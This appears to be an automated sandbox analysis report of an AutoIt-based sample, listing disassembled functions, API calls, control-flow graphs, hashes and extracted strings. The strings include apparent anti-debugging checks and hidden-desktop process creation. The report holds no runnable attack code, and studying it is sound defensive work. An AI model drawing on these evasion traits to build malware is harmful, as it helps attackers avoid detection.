                                      • Instruction ID: 8300ab69b92238e09c93d6f6de62c89295980272c336d2a41a324f9228230c9d
                                      • Opcode Fuzzy Hash: 4160a9d561f2c936a48976a2878befa4f6040f098dec3e3b26b6f3958065a43d
                                      • Instruction Fuzzy Hash: AD51E431944248EECF01ABB8DC4AEEEBB7CFF45341F144069F562E2262DA754588CF22
                                      Function 03CC5D2E Relevance: 15.1, APIs: 10, Instructions: 102stringlibrarythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 03CC5D3F
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 03CC5D4C
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 03CC5D52
                                      • lstrlen.KERNEL32(00000000), ref: 03CC5D7D
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03CC5DD2
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5DE2
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03CC5E0E
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E1E
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E48
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E58
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                      • String ID:
                                      • API String ID: 1599918012-0
                                      • Opcode ID: 0344ba86581cdf32a94fb574eaf46c3f73ae3c3a0e213fbf014252a823f15d60
                                      • Instruction ID: 3d56e9e5bc40f6eebc1af7705512a2b8cf031d699ae09d25754a75fb226a7bd6
                                      • Opcode Fuzzy Hash: 0344ba86581cdf32a94fb574eaf46c3f73ae3c3a0e213fbf014252a823f15d60
                                      • Instruction Fuzzy Hash: 87319375E143897EEF11DAF9C884FEFB7BC9B08300F484199E145EA186D6B8EA44CB50
                                      Function 011D321B Relevance: 15.1, APIs: 10, Instructions: 102stringlibrarythreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1516 11d321b 1517 11d321c-11d324d lstrcpyn GetThreadLocale GetLocaleInfoA 1516->1517 1518 11d334c-11d3352 1517->1518 1519 11d3253-11d3257 1517->1519 1520 11d3259-11d325d 1519->1520 1521 11d3263-11d327a lstrlen 1519->1521 1520->1518 1520->1521 1522 11d327f-11d3285 1521->1522 1523 11d3287-11d3290 1522->1523 1524 11d3292-11d329b 1522->1524 1523->1524 1526 11d327c 1523->1526 1524->1518 1525 11d32a1-11d32a8 1524->1525 1527 11d32aa-11d32d4 lstrcpyn LoadLibraryExA 1525->1527 1528 11d32d6-11d32d8 1525->1528 1526->1522 1527->1528 1528->1518 1529 11d32da-11d32de 1528->1529 1529->1518 1530 11d32e0-11d3314 lstrcpyn LoadLibraryExA 1529->1530 1530->1518 1531 11d3316-11d334a lstrcpyn LoadLibraryExA 1530->1531 1531->1518
                                      APIs
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 011D322C
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 011D3239
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 011D323F
                                      • lstrlen.KERNEL32(00000000), ref: 011D326A
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 011D32BF
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D32CF
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 011D32FB
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D330B
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D3335
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D3345
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                      • String ID:
                                      • API String ID: 1599918012-0
                                      • Opcode ID: e261d97cc2f5a6aea1d14934ee5f21dfe5313eca4c65cc1ed50e80ae26d9e114
                                      • Instruction ID: 89a1a51a95951bf601ba3d54e4dfe20f283b5630bde939b00fba26f30a10fd49
                                      • Opcode Fuzzy Hash: e261d97cc2f5a6aea1d14934ee5f21dfe5313eca4c65cc1ed50e80ae26d9e114
                                      • Instruction Fuzzy Hash: 963162B1E0421E7EEF19DAECC885FEF77BDAB28704F0040A5A155E2181DBB8DA458B51
                                      Function 03CF3704 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 167processsynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 03CF37CE
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,03CF38FD,?,?,?), ref: 03CF380F
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 03CF384C
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,03CF38FD,?,?,?), ref: 03CF3885
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 03CF38BD
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,03CF38FD,?,?), ref: 03CF38D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$Process$DesktopObjectSingleWait
                                      • String ID: D
                                      • API String ID: 183768610-2746444292
                                      • Opcode ID: d5ea19be66420c2e07f373c7ba9845047262881f91a2ce5729495edac2d69f66
                                      • Instruction ID: d01a5226007f18289fea9195b320932267326979f32ab13fb6973db8079f6e87
                                      • Opcode Fuzzy Hash: d5ea19be66420c2e07f373c7ba9845047262881f91a2ce5729495edac2d69f66
                                      • Instruction Fuzzy Hash: 4A514B79A50388BEEB11EB95CC81F9EB7B8EF04310F618129E614FB2D0D774AA049B14
                                      Function 00815D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 00815D40
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • GetCurrentProcess.KERNEL32(?,00890A18,00000000,00000000,?), ref: 00815E07
                                      • IsWow64Process.KERNEL32(00000000), ref: 00815E0E
                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00815E54
                                      • FreeLibrary.KERNEL32(00000000), ref: 00815E5F
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00815E90
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00815E9C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                      • String ID:
                                      • API String ID: 1986165174-0
                                      • Opcode ID: a19537f1e5818bf19a2c49c9b9b1394dac888c5df28a2eb970bbda8e58d1e520
                                      • Instruction ID: 299624f8828803ec4e1f354804bc1c11808124c772ac6d5d2359f8c43a414e3b
                                      • Opcode Fuzzy Hash: a19537f1e5818bf19a2c49c9b9b1394dac888c5df28a2eb970bbda8e58d1e520
                                      • Instruction Fuzzy Hash: 2B91E331949BC4DECB31CB6894545EABFE9FF69301B880A5ED0C7C3A41D230A688C75A
                                      Function 00801663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00801DD6
                                      • GetSysColor.USER32(0000000F), ref: 00801E2A
                                      • SetBkColor.GDI32(?,00000000), ref: 00801E3D
                                        • Part of subcall function 0080166C: DefDlgProcW.USER32(?,00000020,?), ref: 008016B4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ColorProc$LongWindow
                                      • String ID:
                                      • API String ID: 3744519093-0
                                      • Opcode ID: 4ce3da2762e866081002205d9c8465ba26fb608cccfe8c85c12b2bc50227e7cb
                                      • Instruction ID: 7a4e6e41f54e08e7c8204aa36131426eac8ee4844f228b0a5a313a430a8534e6
                                      • Opcode Fuzzy Hash: 4ce3da2762e866081002205d9c8465ba26fb608cccfe8c85c12b2bc50227e7cb
                                      • Instruction Fuzzy Hash: 0BA125B0105508BAEE68BB6D8C4DE7F359DFF82329F14411AFA02D61D2CB319D02D6B6
                                      Function 00815F8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsThemeActive.UXTHEME ref: 00815FEF
                                        • Part of subcall function 0082359C: __lock.LIBCMT ref: 008235A2
                                        • Part of subcall function 0082359C: DecodePointer.KERNEL32(00000001,?,00816004,00858892), ref: 008235AE
                                        • Part of subcall function 0082359C: EncodePointer.KERNEL32(?,?,00816004,00858892), ref: 008235B9
                                        • Part of subcall function 00815F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00815F18
                                        • Part of subcall function 00815F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00815F2D
                                        • Part of subcall function 00815240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0081526C
                                        • Part of subcall function 00815240: IsDebuggerPresent.KERNEL32 ref: 0081527E
                                        • Part of subcall function 00815240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 008152E6
                                        • Part of subcall function 00815240: SetCurrentDirectoryW.KERNEL32(?), ref: 00815366
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0081602F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                      • String ID:
                                      • API String ID: 1438897964-2740779761
                                      • Opcode ID: 531b1cf3ab5fb0addcd904136a4e0f0e77f22920e92548748ddcd522f232777b
                                      • Instruction ID: d7010665a0da3cd603e7a74db725a5f97c117ea14ae539c0cef4fad0c4549569
                                      • Opcode Fuzzy Hash: 531b1cf3ab5fb0addcd904136a4e0f0e77f22920e92548748ddcd522f232777b
                                      • Instruction Fuzzy Hash: E9116771908302DBC310EF69EC0594ABBF8FF98350F00491AF485D72A1DB709584CF96
                                      Function 0080BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • timeGetTime.WINMM ref: 0080BF57
                                        • Part of subcall function 008052B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008052E6
                                      • Sleep.KERNEL32(0000000A,?,?), ref: 008436B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessagePeekSleepTimetime
                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                      • API String ID: 1792118007-922114024
                                      • Opcode ID: 3d00c51890a37a92a341a362dd47318d14c8511fc767ad8c03180e55f67644fe
                                      • Instruction ID: 3c35ad3a1895ecc554d7b767432fb1e4acfc6fa7b74d186e07ef0815632ffc62
                                      • Opcode Fuzzy Hash: 3d00c51890a37a92a341a362dd47318d14c8511fc767ad8c03180e55f67644fe
                                      • Instruction Fuzzy Hash: A2C29D70608745DFD768DF28C884BAAB7E5FF84304F14891DE58AD72A1DB71E984CB82
                                      Function 03D21944 Relevance: 47.7, APIs: 3, Strings: 24, Instructions: 406sleepthreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 771 3d21944-3d21947 772 3d2194c-3d21951 771->772 772->772 773 3d21953-3d219ba call 3cc67f0 call 3cc4440 call 3cf8af4 call 3cf6aec call 3cf82d8 772->773 784 3d219dc-3d219e8 call 3cf7efc 773->784 785 3d219bc-3d219d7 call 3cc4714 call 3cf4ba4 773->785 791 3d219ea-3d219f9 call 3cf47b8 call 3cf76cc 784->791 792 3d219fe-3d21a17 call 3cf5300 call 3cf8f70 call 3cf82d8 784->792 785->784 791->792 802 3d21a39-3d21a65 call 3cf5150 call 3cf7634 call 3cc46d0 call 3cf7efc 792->802 803 3d21a19-3d21a34 call 3cc4714 call 3cf4ba4 792->803 815 3d21ad7-3d21ade Sleep call 3d1787c 802->815 816 3d21a67-3d21ad2 call 3cf5150 call 3cf7634 call 3cc46d0 call 3cf2b08 call 3cf48b0 call 3cf5150 call 3cf7634 call 3cc46d0 call 3cf47b8 Sleep 802->816 803->802 820 3d21ae3-3d21b45 call 3cf7634 call 3cc4714 call 3cf7634 call 3cc4714 call 3cd63c0 call 3cf8bfc 815->820 816->815 846 3d21b47-3d21b56 call 3cc4440 820->846 847 3d21b58-3d21b76 call 3cd63c0 call 3cf8bfc 820->847 855 3d21bc9-3d21bd1 846->855 861 3d21b78-3d21b87 call 3cc4440 847->861 862 3d21b89-3d21ba7 call 3cd63c0 call 3cf8bfc 847->862 857 3d21bd3-3d21bdb 855->857 858 3d21bdd-3d21c11 call 3cd6ac0 * 2 855->858 857->858 863 3d21c39-3d21c41 857->863 858->863 878 3d21c13-3d21c33 call 3cf6a08 call 3cc7ff8 call 3cc4814 858->878 861->855 882 3d21bba-3d21bc4 call 3cc4440 862->882 883 3d21ba9-3d21bb8 call 3cc4440 862->883 867 3d21c43-3d21c4b 863->867 868 3d21c4d call 3cf2a90 863->868 867->868 872 3d21c52-3d21c67 call 3cf66b0 call 3cc4814 867->872 868->872 888 3d21d0b-3d21d13 872->888 889 3d21c6d-3d21c8c call 3cf5118 call 3cc46d0 call 3cf7efc 872->889 878->863 906 3d21f89-3d21fa6 call 3cc4410 878->906 882->855 883->855 892 3d21e0a-3d21e33 call 3cf1760 call 3cd63c0 call 3cf8bfc 888->892 893 3d21d19-3d21d20 call 3cebc84 888->893 889->888 918 3d21c8e-3d21d08 call 3cf4548 call 3ceb9c8 call 3cc8c30 call 3cf4548 call 3cf5118 call 3cc46d0 call 3cf2b08 call 3cf48b0 call 3cf5118 call 3cc46d0 call 3cf47b8 889->918 919 3d21e35-3d21e3d 892->919 920 3d21e4e-3d21e7b call 3ceddf4 GetCurrentThreadId call 3cf66b0 call 3cc4814 892->920 893->892 904 3d21d26-3d21d44 call 3cd63c0 call 3cf8bfc 893->904 925 3d21d66-3d21d93 call 3cf7724 call 3cc46d0 call 3cf3fd0 call 3cc4440 904->925 926 3d21d46-3d21d64 call 3cd63c0 call 3cf8bfc 904->926 918->888 919->920 923 3d21e3f-3d21e47 919->923 953 3d21e81-3d21ea9 call 3cf5118 call 3cc46d0 call 3cf7efc 920->953 954 3d21f47-3d21f53 call 3cf82d8 920->954 923->920 929 3d21e49 call 3cf038c 923->929 967 3d21dec-3d21e03 call 3cf121c call 3cefe34 925->967 926->925 946 3d21d95-3d21db9 call 3cd63c0 call 3cf8bfc 926->946 929->920 946->967 976 3d21dbb-3d21de7 call 3cc2db0 call 3cf3fd0 call 3cc4440 946->976 953->954 990 3d21eaf-3d21f42 call 3cf5118 call 3cc46d0 call 3cf2b08 call 3cf5118 call 3cc46d0 call 3cf2b08 call 3cf5118 call 3cc46d0 call 3cf2b08 call 3cf5118 call 3cc46d0 call 3cf2b08 953->990 969 3d21f55-3d21f64 call 3cef7c0 call 3cf28a8 954->969 970 3d21f69-3d21f84 call 3cf5118 call 3cf28a8 call 3cefa28 call 3d200a8 954->970 967->892 997 3d21e05 call 3cf76cc 967->997 969->970 970->906 976->967 990->954 997->892
                                      APIs
                                        • Part of subcall function 03CF47B8: Sleep.KERNEL32(00000002,00000000,03CF4829,?,00000001), ref: 03CF4809
                                      • Sleep.KERNEL32(000007D0,00000000,03D21FA7,?,00000014,00000000,00000000), ref: 03D21AD2
                                      • Sleep.KERNEL32(00000064,00000000,03D21FA7,?,00000014,00000000,00000000), ref: 03D21AD9
                                      • GetCurrentThreadId.KERNEL32 ref: 03D21E53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$CurrentThread
                                      • String ID: 6.5.9$AHK$AU3$DLL$Yes$abby$autoit3.exe$c.txt$c:\debugg$c:\temp\just_test.txt$c:\temp\quick$c:\temp\test_ok$c:\tes2\$cc.txt$debug 0 $mutex0$mutex1$script.a3x$test$test.txt$u.txt$uu.txt$vbc.exe$xdebug 0
                                      • API String ID: 1849766040-4083824653
                                      • Opcode ID: 354d98dcdbad1533d39e75a9bb7a5d2ea41942eba16081f629d74fcc3d72aca5
                                      • Instruction ID: f60e06ab5985a1fa2d583260300246a616ba9e613bf1f7f57cbc140070889eb2
                                      • Opcode Fuzzy Hash: 354d98dcdbad1533d39e75a9bb7a5d2ea41942eba16081f629d74fcc3d72aca5
                                      • Instruction Fuzzy Hash: 3EF1633D6003588FCB61FBA8D880A9DBBB5AF65308F528491E604DF715CB31AD46EB61
                                      Function 00802BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1031 802ba9-802bbf call 820fe6 1034 802bc5-802be0 call 80112a 1031->1034 1035 802e06 1031->1035 1039 802be6-802bf9 call 801307 1034->1039 1040 83c3fd-83c401 1034->1040 1038 802e0d 1035->1038 1041 802e14 1038->1041 1044 802bfb-802c18 1039->1044 1043 83c407 1040->1043 1040->1044 1049 802e1b 1041->1049 1046 83c40d-83c413 1043->1046 1047 802c1a 1044->1047 1048 802c1f-802c30 1044->1048 1046->1044 1051 83c419-83c41c 1046->1051 1047->1048 1048->1038 1050 802c36-802c3c 1048->1050 1054 802e23 1049->1054 1050->1041 1053 802c42-802c52 1050->1053 1051->1046 1052 83c41e 1051->1052 1052->1044 1055 83c423-83c428 1053->1055 1056 802c58-802c6d 1053->1056 1054->1040 1057 83c45a-83c472 call 8029e2 1055->1057 1058 83c42a-83c42c 1055->1058 1056->1049 1059 802c73-802c77 1056->1059 1072 83c486-83c4d6 GetWindowRect GetClientRect GetSystemMetrics * 2 1057->1072 1073 83c474-83c47f 1057->1073 1062 83c431 1058->1062 1059->1054 1061 802c7d-802c80 1059->1061 1063 802c82-802cac SystemParametersInfoW GetSystemMetrics 1061->1063 1064 802caf-802cb3 1061->1064 1065 83c433-83c43d call 801377 1062->1065 1066 83c43f-83c44a 1062->1066 1063->1064 1069 802cb5-802ce8 SystemParametersInfoW GetSystemMetrics 1064->1069 1070 802cfb-802d56 SetRect AdjustWindowRectEx CreateWindowExW 1064->1070 1071 83c453 1065->1071 1066->1071 1069->1070 1074 802cea-802cf8 GetSystemMetrics 1069->1074 1076 802d5c-802dbf SetWindowLongW GetClientRect GetStockObject SendMessageW call 802714 1070->1076 1077 83c42e 1070->1077 1071->1057 1078 83c4e3 1072->1078 1079 83c4d8-83c4e0 GetSystemMetrics 1072->1079 1073->1072 1074->1070 1085 802dc1-802dd2 SetTimer 1076->1085 1086 802dd7-802df5 call 803336 1076->1086 1077->1062 1081 83c4eb-83c4ef 1078->1081 1079->1078 1083 83c4f5-83c4f9 1081->1083 1084 83c44c-83c44e call 88b3c7 1081->1084 1083->1084 1087 83c4ff-83c503 call 802e2b 1083->1087 1084->1071 1085->1086 1086->1081 1093 802dfb-802e03 1086->1093 1092 83c508 1087->1092 1092->1092
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00802C8C
                                      • GetSystemMetrics.USER32(00000007), ref: 00802C94
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00802CBF
                                      • GetSystemMetrics.USER32(00000008), ref: 00802CC7
                                      • GetSystemMetrics.USER32(00000004), ref: 00802CEC
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00802D09
                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00802D19
                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00802D4C
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00802D60
                                      • GetClientRect.USER32(00000000,000000FF), ref: 00802D7E
                                      • GetStockObject.GDI32(00000011), ref: 00802D9A
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00802DA5
                                        • Part of subcall function 00802714: GetCursorPos.USER32(?), ref: 00802727
                                        • Part of subcall function 00802714: ScreenToClient.USER32(008C77B0,?), ref: 00802744
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000001), ref: 00802769
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000002), ref: 00802777
                                      • SetTimer.USER32(00000000,00000000,00000028,008013C7), ref: 00802DCC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI
                                      • API String ID: 1458621304-248962490
                                      • Opcode ID: 521b5e3a5aae353e398510809b7d585310a8184a445f97e32f51f1d0b4da8de7
                                      • Instruction ID: 2d1dbde945f6441e2004817e833e17b795d7f69436a2f49d6a4b13b8c40c5b44
                                      • Opcode Fuzzy Hash: 521b5e3a5aae353e398510809b7d585310a8184a445f97e32f51f1d0b4da8de7
                                      • Instruction Fuzzy Hash: A0B14B71A0020AAFDB54DFA8DC59BAE7BB4FB48314F104229FA15E72D0DB74A850CF95
                                      Function 00812FC5 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1207 812fc5-8130ea call 831b70 call 811207 call 8200cf call 8208c1 call 811900 call 814c94 call 811207 call 8119e1 RegOpenKeyExW 1224 8130f0-81310d call 811cb6 * 2 1207->1224 1225 8501a3-8501be RegQueryValueExW 1207->1225 1227 850235-850241 RegCloseKey 1225->1227 1228 8501c0-8501ff call 820fe6 call 81433f RegQueryValueExW 1225->1228 1227->1224 1231 850247-85024b 1227->1231 1240 850201-85021b call 811821 1228->1240 1241 85021d-850223 1228->1241 1233 850250-850276 call 811609 * 2 1231->1233 1248 850278-850286 call 811609 1233->1248 1249 85029b-8502a8 call 822e2c 1233->1249 1240->1241 1245 850225-850232 call 82105c * 2 1241->1245 1246 850233 1241->1246 1245->1246 1246->1227 1248->1249 1257 850288-850299 call 822fbd 1248->1257 1259 8502ce-850308 call 811a36 call 814c94 call 811cb6 call 811609 1249->1259 1260 8502aa-8502bb call 822e2c 1249->1260 1268 85030e-85030f 1257->1268 1259->1224 1259->1268 1260->1259 1269 8502bd-8502cd call 822fbd 1260->1269 1268->1233 1269->1259
                                      APIs
                                        • Part of subcall function 008200CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00813094), ref: 008200ED
                                        • Part of subcall function 008208C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0081309F), ref: 008208E3
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008130E2
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008501BA
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008501FB
                                      • RegCloseKey.ADVAPI32(?), ref: 00850239
                                      • _wcscat.LIBCMT ref: 00850292
                                      Strings
                                      Memory Dump Source
